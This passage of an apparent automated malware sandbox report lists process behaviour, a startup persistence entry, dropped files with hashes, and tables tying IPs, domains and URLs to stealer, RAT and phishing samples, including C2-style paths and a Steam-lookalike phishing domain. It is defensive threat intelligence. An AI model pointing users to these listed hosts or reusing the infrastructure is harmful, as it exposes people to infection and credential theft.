                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          16:39:43API Interceptor2x Sleep call for process: zkwindow.exe modified
                                                                                                                                                                          16:39:46API Interceptor147x Sleep call for process: powershell.exe modified
                                                                                                                                                                          16:40:30API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                                                                                                          16:40:40API Interceptor60726x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                          20:40:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bkhArchivev5.lnk

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          164.132.58.105Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                            Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                              plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                      XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                            setup.exeGet hashmaliciousBabadeda, RHADAMANTHYS, RedLineBrowse
                                                                                                                                                                                              188.114.97.3ulQGCeP6wq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.braposaldesk.cyou/a5hz/
                                                                                                                                                                                              ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.actpisalnplay.cyou/3vjo/
                                                                                                                                                                                              Payment-031025-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.timeinsardinia.info/jjft/
                                                                                                                                                                                              F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.shuangunder.shop/udq7/
                                                                                                                                                                                              jzqc1V4NqB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.sislieskort.xyz/glm7/?WBuDj=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/oleOey1kataonb6oQhexxcfP9PB04Q==&Jzwht=FNiD
                                                                                                                                                                                              CjbMEPJZ3J.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.desktitle.homes/izqs/?8v4Hv=cpKH3h&bnb=znOuwYiaskOFcyM/GsSqn0JEMJbSyMHsSdveYB/23/UFYHNBzQzlITz69DD5sgGZofP3y1oDPTsA91VvhFndYIKmLNl26ZFfZBVczyXjFCmbdDFThg==
                                                                                                                                                                                              rPO-20429124.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.sld6.rest/q0rl/
                                                                                                                                                                                              r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.timeinsardinia.info/50g8/
                                                                                                                                                                                              https://u.to/8eAUIgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • staemconmmuntiy.com/gift/id=746904
                                                                                                                                                                                              rRFQ24A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.sld6.rest/q0rl/
                                                                                                                                                                                              92.255.85.36https://cta.berlmember.com/google/captcha.htmlGet hashmaliciousCAPTCHA Scam ClickFix, RedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36:9000/wbinjget?q=6AEDC914829F8EAA95EB40B1CE375D99
                                                                                                                                                                                              aLS3xiFr39.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
                                                                                                                                                                                              0Hw4Pw6xRd.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
                                                                                                                                                                                              VIkn1bnYkP.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
                                                                                                                                                                                              4BLDo0d9gL.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36:9000/wbinjget?q=405E1946CFDABCFF1D56C0C7D7E3D09D
                                                                                                                                                                                              SplashWin.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 92.255.85.36:9000/wbinjget?q=DCD19E1DA2479B3D22ABB9ECA2F479AC

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCOTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 84.201.210.23
                                                                                                                                                                                              PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 84.201.210.23
                                                                                                                                                                                              Section_PE32_image_AmiSyncSetupData_AmiSyncSetupData_body.efi.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 217.20.57.34
                                                                                                                                                                                              PatricksParabox.exe.bin.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                              • 217.20.57.20
                                                                                                                                                                                              Section_PE32_image_PpamPlatformSmm_PpamPlatformSmm_body.efi.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 217.20.57.19
                                                                                                                                                                                              221036299-043825-sanlccjavap0004-6531.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 217.20.57.34
                                                                                                                                                                                              f1215469392.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 217.20.57.19
                                                                                                                                                                                              DIR-A_JY4878249#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 84.201.210.39
                                                                                                                                                                                              SecuriteInfo.com.Win64.DropperX-gen.32756.21147.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 217.20.57.35
                                                                                                                                                                                              Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 217.20.57.36
                                                                                                                                                                                              pki-goog.l.google.comSection_PE32_image_Aint13_Aint13_body.efi.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.217.18.3
                                                                                                                                                                                              x3xqeKOaAd.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                                                              • 142.250.186.163
                                                                                                                                                                                              fg.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                              • 172.217.18.3
                                                                                                                                                                                              zabwpkovl0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 142.250.184.195
                                                                                                                                                                                              Legjong.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.217.16.195
                                                                                                                                                                                              sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                                              • 142.250.184.195
                                                                                                                                                                                              cexqIzhyvM.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 172.217.18.3
                                                                                                                                                                                              KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.217.18.3
                                                                                                                                                                                              KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 142.250.185.163
                                                                                                                                                                                              uolmaTGkHh.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              • 142.250.186.67
                                                                                                                                                                                              rentry.orgMagic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 198.251.88.130

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUSniceworkingskilldevelopedwithgreatnews.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 104.21.16.1
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              http://5148882780.sbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.18.94.41
                                                                                                                                                                                              2510-hamil siparis formu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.63.150
                                                                                                                                                                                              https://simplified.com/designs/7d05440c-37c6-4466-b5ff-6e61f39c0350/share?utm_content=7d05440c-37c6-4466-b5ff-6e61f39c0350&utm_campaign=share&utm_medium=link&utm_source=projectlinksGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.0.227
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.67.204.104
                                                                                                                                                                                              Fd-Employee-Handbook(1).pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              ATT09858.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                              OVHFRURGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 51.222.255.207
                                                                                                                                                                                              Zjf9D3oDifslon7.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 51.222.255.207
                                                                                                                                                                                              https://survey2.lamresearch.com/k/SsQRQWURsRUSsPsPsPsWTRTXRWWPGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 51.195.65.78
                                                                                                                                                                                              New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 51.222.255.207
                                                                                                                                                                                              Setup64.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                                                                                                                              • 151.80.89.228
                                                                                                                                                                                              Setup64.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                                                                                                                              • 151.80.89.228
                                                                                                                                                                                              nklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 51.255.185.125
                                                                                                                                                                                              nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 164.132.129.125
                                                                                                                                                                                              nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 51.254.195.241
                                                                                                                                                                                              jklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 51.161.74.243
                                                                                                                                                                                              SOVTEL-ASRUSecuriteInfo.com.Win32.RATX-gen.12965.16390.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.85.66
                                                                                                                                                                                              GELEPLLV.msiGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.23
                                                                                                                                                                                              wya.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.23
                                                                                                                                                                                              WNBOZYUN.msiGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.23
                                                                                                                                                                                              https://cta.berlmember.com/google/captcha.htmlGet hashmaliciousCAPTCHA Scam ClickFix, RedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36
                                                                                                                                                                                              AUpdate.exe (3).zipGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 92.255.85.36
                                                                                                                                                                                              PMLQRJIN.msiGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.23
                                                                                                                                                                                              aLS3xiFr39.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 92.255.85.36
                                                                                                                                                                                              0Hw4Pw6xRd.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36
                                                                                                                                                                                              VIkn1bnYkP.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                              • 92.255.85.36

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eniceworkingskilldevelopedwithgreatnews.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              file.exeGet hashmaliciousDarkTortilla, XWormBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              Document BT24#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              q2e132qweertgd.exe.bin.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              lalaloopy.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105
                                                                                                                                                                                              SNKO05B241100201.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 164.132.58.105

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\7zip\7za.exeVirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    VirtManage.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):517
                                                                                                                                                                                                      Entropy (8bit):5.3450637334086455
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:Q3La/hg1KDLI4M9tDLI4MWuPTArkvoDLI4MWuCDAZDLI4MWuCv:MLV1qE4qpE4KiE4K9E4Ks
                                                                                                                                                                                                      MD5:43889FFD7EF48A8FC6195BCC922E8BC1
                                                                                                                                                                                                      SHA1:365E4DC155993AC6C085F77FC9DDD167A67900C7
                                                                                                                                                                                                      SHA-256:89F367B50AA0BF58FE305EAF81BF77BC82BB3559F01F8D4D5E782F9A8AD41870
                                                                                                                                                                                                      SHA-512:5475ED79706B09C7084E69D7289C8D7F3E8E4597F60EC08962F14250E138FE5738E625ED3B44DB6A56D04870295B95F12FA84C093ABA3091AD9F5A7A79FA7F00
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):26604
                                                                                                                                                                                                      Entropy (8bit):5.053883819182895
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:SLbV3IpNBQkj2Uh4iUxkOZhxCardFvJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOgqdJJ+OdBOtW
                                                                                                                                                                                                      MD5:9F5869709E8C10EC941464657FF26A26
                                                                                                                                                                                                      SHA1:85B55A98AE8580126A59765159A82601385D62C1
                                                                                                                                                                                                      SHA-256:BE6F41D8AEEAF9183CB61B633B3F46A7B7DBDC2954F40C7A75B5CD5800E0F0C3
                                                                                                                                                                                                      SHA-512:C7884E74269AF609DB901DD2E7639CB4022AAB434C3B387FF3DC952C1689BBD70F675DEAA49B48A6725716D144C325F0A996B9B1DDB4D1FD83BA70CBEA0E4BD5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1464
                                                                                                                                                                                                      Entropy (8bit):5.3216944267734405
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:3mSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUNuTx9r8Hv9ILAl/:WSU4y4RQmFoUeCamfm9qr9tK8NfUNuTM
                                                                                                                                                                                                      MD5:6C24AB9614648EF686B2FD220D046F4D
                                                                                                                                                                                                      SHA1:38A8ECE024779956E223043679CD48953CAC768D
                                                                                                                                                                                                      SHA-256:528F07B2DE5B10749604DF7BB988A12E9FE3C1D2275D35A53DCB344243604011
                                                                                                                                                                                                      SHA-512:C59FE653764D666E624D22D16DE7030C898B691AA8FDACFC60D0AAE7A38ED145380DE0EFF2D90F7D5081ECDE2918BFC99C333C398BAC96B3B5C11B2520FBC622
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:@...e...........).....................L..............@..........@...............|.jdY\.H.s9.!..|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\7z1900-x64.zip

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):615871
                                                                                                                                                                                                      Entropy (8bit):7.99518130235238
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:12288:lrrvQ6eoe9H4GJ43HgVZMe5SPv6G+Ih36k0KIc5RRqEhOE4+MR12J:lHvQx1Z+3HcMOE6XxkNIc5KEhOjR12J
                                                                                                                                                                                                      MD5:467A63327FC1DACC347B6A0AAD98378B
                                                                                                                                                                                                      SHA1:36D731E6B5A89D97BF356A8006E295C5EEA9EBB4
                                                                                                                                                                                                      SHA-256:7D51A111F8265D1377AC9B0746C951EF1189973768B8FE2956AF7D83D4E2CCDA
                                                                                                                                                                                                      SHA-512:1CDFA32A96270EAE4E9842CBEDCFFA1A49365DC4BBA5AF2695F5A1D18EBF197475DB6E883E2FDD108DFE7768E34AA435B789A168081A6F17F72C18A955B7DA73
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:PK..........}YC3M.+e...B......7za.exe.{|....>....$.H......!%......Y.@..((....U.3..5q..f\..Vm......jm+._..........gYQ......s...n.................{..{N..s......q......~..^..5fS...!..n0y...r..+m+.....p..wH....V'.n..v.s.B....33...:ny..O~...E...xo..~........M..w.~O.g....~..~_.........r....7/[.....j...x..g3.)...7.K7[..).c ...F......%...W.g|.p..z!.....GnT.0n5>...v...0...2py.a....l.{&...........h?y....l.W;......8.`Z...e.o.o..1..q.o...p..0......,.s..r}.{.Y....V.-.8.'.....;@...v.dl.q.+n...V.r.../.?q.UW/........../.E.\r.J.._k.....'.k.......(ag.1.t.........~..$...&...!r.s.1.....C.Q...\...e...*..4......-...Q..WY.6...{.,....)....@..Vv...........Ba.p.p..d...-n..$.b..../d..\Q..7..).........[..i...$(..v...&.B6u.. X10.X...Ii....z.O...A..h......N. .....m...f=..Kx]vM...l> *......Q.......v.oR..|X.A...P.CT......>Q.o.c..[.#...<....n1.)(UOQ7...$.cOw.........$1.........0.Rc.xu..G...=..V.c...p.^y.z)>z..B1pe......Mk.JNQ..c...lE=....M.O`=.Ai(+.t.U..G.X\%

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\7zip\7za.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1327616
                                                                                                                                                                                                      Entropy (8bit):6.299693551777347
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24576:Ji5MAySNDSx7d+g3VHbnRnM1e5Bypz++IiW9:J8yPxkg3VHbdyo+9
                                                                                                                                                                                                      MD5:C58A4193BAC738B1A88ACAD9C6A57356
                                                                                                                                                                                                      SHA1:66E5BD096F4E20E0423BC1540BD2B880B150D9A1
                                                                                                                                                                                                      SHA-256:FBB3DADCC29BCBC5460484D858C5F33F99E5317F5F6CD8D9C83F4DD8C39B3E30
                                                                                                                                                                                                      SHA-512:97CA384562FA9E49D0B32486AE181A4474C5277F2B48CEFB2F4B479AE6797E1369A867CF8E5B39C77A10E38970DE62F3EC43F1BEB1B4B203C4110AFE819F2CF4
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                      • Filename: VirtManage.exe, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: VirtManage.exe, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: VirtManage.exe, Detection: malicious, Browse
                                                                                                                                                                                                      • Filename: VirtManage.exe, Detection: malicious, Browse
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..............X ../...X ..%..........X ....X ......;..+.....)...X ../...X ../...Rich............................PE..d... .Jg.........."...........................@..............................0............`.....................................................x...............................4....................................................................................text...~........................... ..`.rdata..............................@..@.data........ ......................@....pdata..............................@..@.rsrc...............................@..@.reloc... ......."... ..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\7zip\7za.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2871768
                                                                                                                                                                                                      Entropy (8bit):6.4994976421842106
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:LvwQfPs3HK1UkpgSwrqdEAHZod3r6++uThkv5380UnkM:LvvOHu/yJr6+Iv5380MkM
                                                                                                                                                                                                      MD5:9883F2B76A55BBA9AD696669845B7AEC
                                                                                                                                                                                                      SHA1:6778E521B30CD2652D3E4D0A2CEDFA3169782523
                                                                                                                                                                                                      SHA-256:F33E603734FDED7452D016E96097DBE144A7294FEA2A504C44693FF06AC8F014
                                                                                                                                                                                                      SHA-512:1B06A8586DC4ADDECE0ADB7950825FF12EFF25184761B0185CB72CE771AF2D154F9B8BA619DD035402E186A389CC8867142361307E4960144FE7EC493BFE2A65
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c..................#...........#.......#...@..........................p,.....1.,..........@...................P%.......%.27....%...............+..E...................................p%.......................%......@%......................text...X.#.......#................. ..`.itext..."....#..$....#............. ..`.data.........#.......#.............@....bss.....q....$..........................idata..27....%..8...Z$.............@....didata......@%.......$.............@....edata.......P%.......$.............@..@.tls....P....`%..........................rdata..]....p%.......$.............@..@.rsrc.........%.......$.............@..@.............p,.......+.............@..@........................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\ISCmplr.dll

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\7zip\7za.exe
